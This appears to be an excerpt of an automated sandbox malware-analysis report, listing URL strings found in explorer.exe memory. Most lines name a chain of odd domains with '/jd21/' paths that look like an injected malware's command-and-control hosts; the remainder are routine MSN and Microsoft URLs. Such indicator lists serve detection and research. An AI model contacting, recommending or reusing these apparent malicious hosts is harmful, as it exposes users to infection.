          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.00050591.xyz
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.00050591.xyz/jd21/
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.00050591.xyz/jd21/www.californiacurrentelectric.com
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.00050591.xyzReferer:
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.arthemis-168bet.site
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.arthemis-168bet.site/jd21/
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.arthemis-168bet.site/jd21/www.fasci.online
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.arthemis-168bet.siteReferer:
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.b2vvuc00.sbs
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.b2vvuc00.sbs/jd21/
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.b2vvuc00.sbs/jd21/www.tyumk.xyz
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.b2vvuc00.sbsReferer:
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.batremake.com
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.batremake.com/jd21/
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.batremake.com/jd21/www.crucka.xyz
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.batremake.comReferer:
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.californiacurrentelectric.com
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.californiacurrentelectric.com/jd21/
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.californiacurrentelectric.com/jd21/www.b2vvuc00.sbs
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.californiacurrentelectric.comReferer:
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.crucka.xyz
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.crucka.xyz/jd21/
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.crucka.xyz/jd21/www.tech-with-thulitha.site
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.crucka.xyzReferer:
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fasci.online
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fasci.online/jd21/
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fasci.online/jd21/www.uhug.xyz
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fasci.onlineReferer:
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fostertv.net
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fostertv.net/jd21/
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fostertv.net/jd21/www.p-afactorysale.shop
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fostertv.netReferer:
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maioral-store.com
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maioral-store.com/jd21/
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maioral-store.com/jd21/www.zaib.art
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maioral-store.comReferer:
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.p-afactorysale.shop
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.p-afactorysale.shop/jd21/
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.p-afactorysale.shop/jd21/www.arthemis-168bet.site
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.p-afactorysale.shopReferer:
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.susansellsmarin.com
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.susansellsmarin.com/jd21/
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.susansellsmarin.com/jd21/www.urbanholidayz.com
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.susansellsmarin.comReferer:
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tech-with-thulitha.site
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tech-with-thulitha.site/jd21/
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tech-with-thulitha.site/jd21/www.fostertv.net
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tech-with-thulitha.siteReferer:
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tyumk.xyz
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tyumk.xyz/jd21/
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tyumk.xyz/jd21/www.susansellsmarin.com
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tyumk.xyzReferer:
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uhug.xyz
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uhug.xyz/jd21/
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uhug.xyz/jd21/www.maioral-store.com
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uhug.xyzReferer:
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.urbanholidayz.com
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.urbanholidayz.com/jd21/
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.urbanholidayz.com/jd21/www.batremake.com
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.urbanholidayz.comReferer:
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zaib.art
          Source: explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zaib.art/jd21/
          Source: explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zaib.artReferer:
          Source: explorer.exe, 00000002.00000000.1718215415.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000002.00000002.4148832143.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3108048542.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
          Source: explorer.exe, 00000002.00000002.4148832143.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3108048542.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
          Source: explorer.exe, 00000002.00000000.1718215415.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000002.00000003.3113987697.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3479427968.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1713933761.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4150997601.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000002.00000003.3113987697.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3479427968.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1713933761.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4150997601.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
          Source: explorer.exe, 00000002.00000002.4144621219.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1709841681.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4143652285.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1710657234.0000000003700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000002.00000003.3479427968.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3113987697.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1713933761.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4150997601.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
          Source: explorer.exe, 00000002.00000003.3113987697.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3479427968.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1713933761.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4150997601.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 00000002.00000003.3479427968.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3113987697.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1713933761.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4150997601.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
          Source: explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
          Source: explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 00000002.00000000.1711936620.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4147214666.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
          Source: explorer.exe, 00000002.00000000.1711936620.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4147214666.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
